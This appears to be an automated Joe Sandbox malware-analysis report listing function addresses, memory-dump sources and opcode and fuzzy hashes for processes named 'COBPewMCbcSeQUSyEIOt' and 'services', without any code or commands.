                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4235117589.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9c1d0000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7b8796cffa75c086d6a141a462acccb19af0f2cfa4ca217529d88f05791274ac
                                                            • Instruction ID: 319a5c72353212c8d6569e37238a0bf7cf4ade93ca2c8f63c3c0b6840c994f34
                                                            • Opcode Fuzzy Hash: 7b8796cffa75c086d6a141a462acccb19af0f2cfa4ca217529d88f05791274ac
                                                            • Instruction Fuzzy Hash: 24D0C912F0DA1785FA3D5AD1807423E51B05F507A1F7446BED19FA18C2EF1C7505A20A
                                                            Function 00007FFD9C1DDDCB Relevance: .0, Instructions: 11COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4235117589.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9c1d0000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f5c8676b47044bbb3c5db7628fae0690d09d220f5ca17a06c309ede9dc85c081
                                                            • Instruction ID: b8b4f45cfec7e62f09eb2e3c7bf5458c598b1687d08470d10aed2c57eef548d8
                                                            • Opcode Fuzzy Hash: f5c8676b47044bbb3c5db7628fae0690d09d220f5ca17a06c309ede9dc85c081
                                                            • Instruction Fuzzy Hash: 91D0C912F1DA1785F9396AD1803033951B55F00780E2446BEC19F618C1ED2CB402622A
                                                            Function 00007FFD9BAD5046 Relevance: .0, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4221642207.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9bad0000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 29210b269bf62c383f94fd596668a6377e2401db163769ff28296a7d212c356a
                                                            • Instruction ID: f5c2ccf946551d72e7a91d812c673509043b37f505a05de0a35f6952e26dabc0
                                                            • Opcode Fuzzy Hash: 29210b269bf62c383f94fd596668a6377e2401db163769ff28296a7d212c356a
                                                            • Instruction Fuzzy Hash: 91D05E34D0602DADEB748B40C9703F871A19FE0300F0501F9C00D221A1CEB92BC08E45
                                                            Function 00007FFD9BAD4FB2 Relevance: .0, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4221642207.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9bad0000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7bc853f4a39b1b3a7627dd885057a2eeb11b1191bd395fd6a25a76276556f71e
                                                            • Instruction ID: f5c2ccf946551d72e7a91d812c673509043b37f505a05de0a35f6952e26dabc0
                                                            • Opcode Fuzzy Hash: 7bc853f4a39b1b3a7627dd885057a2eeb11b1191bd395fd6a25a76276556f71e
                                                            • Instruction Fuzzy Hash: 91D05E34D0602DADEB748B40C9703F871A19FE0300F0501F9C00D221A1CEB92BC08E45
                                                            Function 00007FFD9C1DDDDE Relevance: .0, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4235117589.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9c1d0000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5c26eba563a26d91e49756930272b7e561ce193f96bf6709cf5e85e169b1e10d
                                                            • Instruction ID: ce2181ed8ae71951777afee632c39d82eee517e85b487d812b97d97ee3a05f1f
                                                            • Opcode Fuzzy Hash: 5c26eba563a26d91e49756930272b7e561ce193f96bf6709cf5e85e169b1e10d
                                                            • Instruction Fuzzy Hash: 3EC08C22E0C6438FF2356BA5C03133537B19F02380F2046FAC48E5A4D2DD3839429266
                                                            Function 00007FFD9C1D12DF Relevance: .0, Instructions: 8COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4235117589.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9c1d0000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f976b32be169b52cdb1f329495586d7ab9168eb0251469307a0bea8ffb4f447b
                                                            • Instruction ID: 040bb840ea05a1c274addac95ec3846e1a2a86e915d362b91082e2076feaa3b0
                                                            • Opcode Fuzzy Hash: f976b32be169b52cdb1f329495586d7ab9168eb0251469307a0bea8ffb4f447b
                                                            • Instruction Fuzzy Hash: 3AC08C02F0D2438BE23422F448B003C12B00F07241B240EB1C10B9A2C3E98878005214
                                                            Function 00007FFD9C1E05F4 Relevance: .0, Instructions: 3COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4235117589.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9c1d0000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0bda3b40914ef7fc56c4aff19c97738bfd278a9df348926678cd3063bfa8a8ef
                                                            • Instruction ID: 84de606015a4d73c4bde9d14109d1671a3e53971ab84656007586d273cd8b035
                                                            • Opcode Fuzzy Hash: 0bda3b40914ef7fc56c4aff19c97738bfd278a9df348926678cd3063bfa8a8ef
                                                            • Instruction Fuzzy Hash:

                                                            Non-executed Functions

                                                            Function 00007FFD9BC832D0 Relevance: .3, Instructions: 323COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4225124958.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9bc70000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: de4018b5c50fd03f5cf6c5af52543da546de6c7a8640f82f2a0bfd52515cc67b
                                                            • Instruction ID: 6b068252ff42daec147bb0de1aede7b8200ba644f4dec26701d8f4b48b73bc10
                                                            • Opcode Fuzzy Hash: de4018b5c50fd03f5cf6c5af52543da546de6c7a8640f82f2a0bfd52515cc67b
                                                            • Instruction Fuzzy Hash: 84B1D722A0D2A25BE325F77CB8B24EA3B509F1523F71842F7F89D4D0E7DD19244AC694

                                                            Executed Functions

                                                            Function 00007FFD9BAA0D73 Relevance: .3, Instructions: 289COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000011.00000002.2081187519.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_17_2_7ffd9baa0000_services.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 81db6bb6c277bd76b80f6cfd96fedba4d69b0d5c5198fbd4fbf444e44829e619
                                                            • Instruction ID: 44e238e8f2b4f9644440de7f135d27300dc39dd43ac8e77007a004a30650516e
                                                            • Opcode Fuzzy Hash: 81db6bb6c277bd76b80f6cfd96fedba4d69b0d5c5198fbd4fbf444e44829e619
                                                            • Instruction Fuzzy Hash: 2EA1B275A19A4D8FE7A9DBACC8A57A97BE1FF99314F00027AD00DD72D6CB781801C750
                                                            Function 00007FFD9BAA0B47 Relevance: 2.6, Strings: 2, Instructions: 71COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000011.00000002.2081187519.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_17_2_7ffd9baa0000_services.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: c9$!k9
                                                            • API String ID: 0-3254877420
                                                            • Opcode ID: cac0a9963fa71698ff6fa4d219e2d5413ef2cddfb0e01e5a17da6977c6b15b79
                                                            • Instruction ID: ad24f57b67ac84bc70c6ad35a36236912f1c33e4db88ddce41b6334b9d70dec7
                                                            • Opcode Fuzzy Hash: cac0a9963fa71698ff6fa4d219e2d5413ef2cddfb0e01e5a17da6977c6b15b79
                                                            • Instruction Fuzzy Hash: 4411AF36A2864D8FCB44EF2CD8516E9B7A0FF94324F0105BAE84DD7251D330A969CBC1
                                                            Function 00007FFD9BAA08E8 Relevance: .2, Instructions: 152COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000011.00000002.2081187519.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_17_2_7ffd9baa0000_services.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9c5c27598e5af74deea410db481d915a4781749cd8afd276dee3a099df3e96ef
                                                            • Instruction ID: b873556ce8e79084619fbb9de08963b4452bbd0d3b34b70b6f11ef7f47efe3d4
                                                            • Opcode Fuzzy Hash: 9c5c27598e5af74deea410db481d915a4781749cd8afd276dee3a099df3e96ef
                                                            • Instruction Fuzzy Hash: 8851C130A0851D9FCF54EF58D894AEDBBF1FF58365F050266E419E72A1CA70E990CB80
                                                            Function 00007FFD9BAA090D Relevance: .1, Instructions: 131COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000011.00000002.2081187519.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_17_2_7ffd9baa0000_services.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: df55a52a7f98f1f2df0e69ba0092080aaeb637a4217d01559bd2a7070885bdd3
                                                            • Instruction ID: 95166de2656f6cbf0f13c105eebcb77a1d1df378aafc41bde4e028bce98bc9e5
                                                            • Opcode Fuzzy Hash: df55a52a7f98f1f2df0e69ba0092080aaeb637a4217d01559bd2a7070885bdd3
                                                            • Instruction Fuzzy Hash: 4341E531E0865D5EDB64FBA898A5AFC77A0FF58329F0402BBE41DD6197CE286481C784
                                                            Function 00007FFD9BAA0998 Relevance: .1, Instructions: 107COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000011.00000002.2081187519.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_17_2_7ffd9baa0000_services.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ce6f65847975cd91617c80f6a3e8279dd2ad902b39c14c4d43ddcda17fb0805a
                                                            • Instruction ID: 94507a49782de9170acc17cebf6ca941e23a33743dfb74d4d11823528e1d330b
                                                            • Opcode Fuzzy Hash: ce6f65847975cd91617c80f6a3e8279dd2ad902b39c14c4d43ddcda17fb0805a
                                                            • Instruction Fuzzy Hash: FC313A30A1495D8FDF94EF98C494AEDB7F1FF98315F10016AE40DE32A5CB74A8418B40
                                                            Function 00007FFD9BAA1D6D Relevance: .1, Instructions: 92COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000011.00000002.2081187519.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_17_2_7ffd9baa0000_services.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: cb2be7ffaeca80554c42fe685833038aa533f678e978518671a3910c6ff990c9
                                                            • Instruction ID: 3345492c55d58135914e50e9f7d3534f0b23fc1f21e0c32ac38db9f74af92525
                                                            • Opcode Fuzzy Hash: cb2be7ffaeca80554c42fe685833038aa533f678e978518671a3910c6ff990c9
                                                            • Instruction Fuzzy Hash: 3C319AB0A0452D8FCFA8DF14C855BAAB7B1FB69315F1041EE810EE32A5DB756A80CF45
                                                            Function 00007FFD9BAA16D3 Relevance: .1, Instructions: 82COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000011.00000002.2081187519.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_17_2_7ffd9baa0000_services.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: fef6ad9b8e095fcdb356f5c66ae7b51b91812744eb336611c2704e5067c8b154
                                                            • Instruction ID: cb9e78c297fcde782fbb2b9f293294d8d152e451dd3cf302440074c3a6b835b7
                                                            • Opcode Fuzzy Hash: fef6ad9b8e095fcdb356f5c66ae7b51b91812744eb336611c2704e5067c8b154
                                                            • Instruction Fuzzy Hash: 85313335A0E68E9BE721EF64CC202E97BB1EF51311F0501BAD158C31E1DBB86A44CF51
                                                            Function 00007FFD9BAA0C25 Relevance: .1, Instructions: 80COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000011.00000002.2081187519.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_17_2_7ffd9baa0000_services.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 59e7adbd12e04f18ed2648dc473bc748bb89911690ea321729538e1e9858367f
                                                            • Instruction ID: 6816e5733e80716ae3b2709c426c851902768e28a9ea62972b701af63c1bd522
                                                            • Opcode Fuzzy Hash: 59e7adbd12e04f18ed2648dc473bc748bb89911690ea321729538e1e9858367f
                                                            • Instruction Fuzzy Hash: C621C036B0D64E4BE7329BA8DC112ED7761EF81321F010577C25C8B1E2DA74260AC7A4
                                                            Function 00007FFD9BAA4E4A Relevance: .1, Instructions: 73COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000011.00000002.2081187519.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_17_2_7ffd9baa0000_services.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 23cf2b9782975bda2b4c3e6fccec8bbcfc4ab4a4ed53a08d1185843e818dc3df
                                                            • Instruction ID: 659518db4835abe1736c1e62683d88ae5a13565842e4ea28b6a9b4111ce1b8a6
                                                            • Opcode Fuzzy Hash: 23cf2b9782975bda2b4c3e6fccec8bbcfc4ab4a4ed53a08d1185843e818dc3df
                                                            • Instruction Fuzzy Hash: 0D31E670E0952D8EEBB4DB54C8647E8B2B2EF54301F0506FA900DE22A1DBB96BD08F54
                                                            Function 00007FFD9BAA1172 Relevance: .1, Instructions: 73COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000011.00000002.2081187519.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_17_2_7ffd9baa0000_services.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 251cf750e4d6c6885251a81a06ac39c51588d79e9f67483706561c1f8b745936
                                                            • Instruction ID: eeff989b4e337447fa6a489e10f4528c07060da53c10549d902993333b716984
                                                            • Opcode Fuzzy Hash: 251cf750e4d6c6885251a81a06ac39c51588d79e9f67483706561c1f8b745936
                                                            • Instruction Fuzzy Hash: 8A212A30A1491D9FDB94EFA8C8989ADB7F2FF29300B10057AD419D72A1DB74A981CB50
                                                            Function 00007FFD9BAA0C38 Relevance: .1, Instructions: 61COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000011.00000002.2081187519.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_17_2_7ffd9baa0000_services.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d57b505edc3b787657c200fa3b348d92f0e8e8c400937c672e1a42486313cd6a
                                                            • Instruction ID: 82e87064bfc8efad1730b12031be020fa4bcab47e7eda4f6917e4bce29a46310
                                                            • Opcode Fuzzy Hash: d57b505edc3b787657c200fa3b348d92f0e8e8c400937c672e1a42486313cd6a
                                                            • Instruction Fuzzy Hash: 3E118C35B0D64E4BE731EFA8D8212ED7762EF81310F014533D1599B2E2DA74220AC7A4
                                                            Function 00007FFD9BAA0C40 Relevance: .1, Instructions: 55COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000011.00000002.2081187519.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_17_2_7ffd9baa0000_services.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e0bf8f9fbffd2034265d546a17f16e9812254c68e87c6b156f5f0c2e60093b89
                                                            • Instruction ID: ddc5f4ee8c4e8d7d4952633c5e9b9d7e69ca283d974578e41498314c4e02af31
                                                            • Opcode Fuzzy Hash: e0bf8f9fbffd2034265d546a17f16e9812254c68e87c6b156f5f0c2e60093b89
                                                            • Instruction Fuzzy Hash: FD118E71F0D64E8FE721EFA4C8212ED7762EF41310F014536D1599B2E2CE742209CB64
                                                            Function 00007FFD9BAA0C48 Relevance: .0, Instructions: 49COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000011.00000002.2081187519.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_17_2_7ffd9baa0000_services.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 67f1e20384906922deb9adee92213d8d58902c48c61d932d65f92a7f3cdd755d
                                                            • Instruction ID: 4cd1fdd045e710ebfa7e16ee5a2eb1e1383892a625a71dcfd75e3c56b29ba02c
                                                            • Opcode Fuzzy Hash: 67f1e20384906922deb9adee92213d8d58902c48c61d932d65f92a7f3cdd755d
                                                            • Instruction Fuzzy Hash: 2E016871E0E64E8FE721EFA4C8102EDB762EF41310F004576D1199B2E2CE742215CB94
                                                            Function 00007FFD9BAA0C50 Relevance: .0, Instructions: 44COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000011.00000002.2081187519.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_17_2_7ffd9baa0000_services.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0a3ea4df554a09d70c5c4aa7c371c7ea7a7919f844a9e2f3bfb9e97443b580f1
                                                            • Instruction ID: 31c6e2cbf3fd51b09bf3e7fdbfee70c49a4b54a42b33ca3f7c8f86145a8a6c83
                                                            • Opcode Fuzzy Hash: 0a3ea4df554a09d70c5c4aa7c371c7ea7a7919f844a9e2f3bfb9e97443b580f1
                                                            • Instruction Fuzzy Hash: CF014770E0E68E8BE721EFA4C8502EDB762EF05310F000676D519972E2CE782214C754
                                                            Function 00007FFD9BAAA5F4 Relevance: .0, Instructions: 44COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000011.00000002.2081187519.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_17_2_7ffd9baa0000_services.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9bc39386854655d42eff0f1abff3126745b0e9c6f1f60f1bb56931f2762ffba0
                                                            • Instruction ID: b9baff2fd1a85c81420e2958cde89bd78acdeed94274ebcbdcdb1e9abaee5831
                                                            • Opcode Fuzzy Hash: 9bc39386854655d42eff0f1abff3126745b0e9c6f1f60f1bb56931f2762ffba0
                                                            • Instruction Fuzzy Hash: 8B11E671E0552D8AEBB4DB54CC986A873B2EF94305F1102EA900DA62A5CB792E85CF94
                                                            Function 00007FFD9BAA510C Relevance: .0, Instructions: 41COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000011.00000002.2081187519.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_17_2_7ffd9baa0000_services.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1a333cf515a8535c9eb7fadc2ac6429caa7517b7d4972cea5c437f577ee6c2ad
                                                            • Instruction ID: 2736e0d0923945d456d1c00a79f1b1bd39e40dc8c906c4ce5c1a1faa1ac4d82a
                                                            • Opcode Fuzzy Hash: 1a333cf515a8535c9eb7fadc2ac6429caa7517b7d4972cea5c437f577ee6c2ad
                                                            • Instruction Fuzzy Hash: 80119570D0652D9EEBB4DB54C8A47E8B6B2EB94301F1000E9D00DA32A1CEB62BD0CF54
                                                            Function 00007FFD9BAA06A5 Relevance: .0, Instructions: 35COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000011.00000002.2081187519.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_17_2_7ffd9baa0000_services.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 255b330cda0914a4af93c5c95f2400dfacc35491948c0de2ab20ee978178b3ee
                                                            • Instruction ID: 18adfe7e23d56e33d25fca78d788481418ceea4eb715d86f12d0e182c9818d2c
                                                            • Opcode Fuzzy Hash: 255b330cda0914a4af93c5c95f2400dfacc35491948c0de2ab20ee978178b3ee
                                                            • Instruction Fuzzy Hash: 70F03030A1950E9FEB60EF98D4596ED77A1FF64704F110436E41CD21A0DAB466A4CB85
                                                            Function 00007FFD9BAA06C8 Relevance: .0, Instructions: 30COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000011.00000002.2081187519.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_17_2_7ffd9baa0000_services.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5b5a69f4bd4cefffe38dd5d1dbac8527bbb49b7b2065dd24eba061c982aed73a
                                                            • Instruction ID: 1d113fb57f32641839757b2512f988349a02df57902cb1d3a5154f26ef946227
                                                            • Opcode Fuzzy Hash: 5b5a69f4bd4cefffe38dd5d1dbac8527bbb49b7b2065dd24eba061c982aed73a
                                                            • Instruction Fuzzy Hash: A4F01230A1554E9FDF90EF64C4496EE77E1FF14304F01447AE81CD2160DA70A6A4CB81
                                                            Function 00007FFD9BAA7127 Relevance: .0, Instructions: 27COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000011.00000002.2081187519.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_17_2_7ffd9baa0000_services.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 80338b6ba67a754664934a6ac6536264d23993a6ff0ca8e203410fc86db4f8e6
                                                            • Instruction ID: 486cdf532cb5b3889ef1ea2d1cfbc3ded3e18f4116d74e8953f2e5e233c3646c
                                                            • Opcode Fuzzy Hash: 80338b6ba67a754664934a6ac6536264d23993a6ff0ca8e203410fc86db4f8e6
                                                            • Instruction Fuzzy Hash: 79F07970E1A52E8EEB74DB54C858BBDB7B2EB54304F1150F9D10EA6292CAB42F81CF14
                                                            Function 00007FFD9BAA5046 Relevance: .0, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000011.00000002.2081187519.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_17_2_7ffd9baa0000_services.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 29210b269bf62c383f94fd596668a6377e2401db163769ff28296a7d212c356a
                                                            • Instruction ID: 13490c169a214984d92dcdbc831685e5c2fca2e4b3278098a12d350ecb613cd8
                                                            • Opcode Fuzzy Hash: 29210b269bf62c383f94fd596668a6377e2401db163769ff28296a7d212c356a
                                                            • Instruction Fuzzy Hash: E8D09E74D1612DADEB749B40C9643F875739F51300F5500B9D04D261A1CEB91BD49E69
                                                            Function 00007FFD9BAA4FB2 Relevance: .0, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000011.00000002.2081187519.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_17_2_7ffd9baa0000_services.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7bc853f4a39b1b3a7627dd885057a2eeb11b1191bd395fd6a25a76276556f71e
                                                            • Instruction ID: 13490c169a214984d92dcdbc831685e5c2fca2e4b3278098a12d350ecb613cd8
                                                            • Opcode Fuzzy Hash: 7bc853f4a39b1b3a7627dd885057a2eeb11b1191bd395fd6a25a76276556f71e
                                                            • Instruction Fuzzy Hash: E8D09E74D1612DADEB749B40C9643F875739F51300F5500B9D04D261A1CEB91BD49E69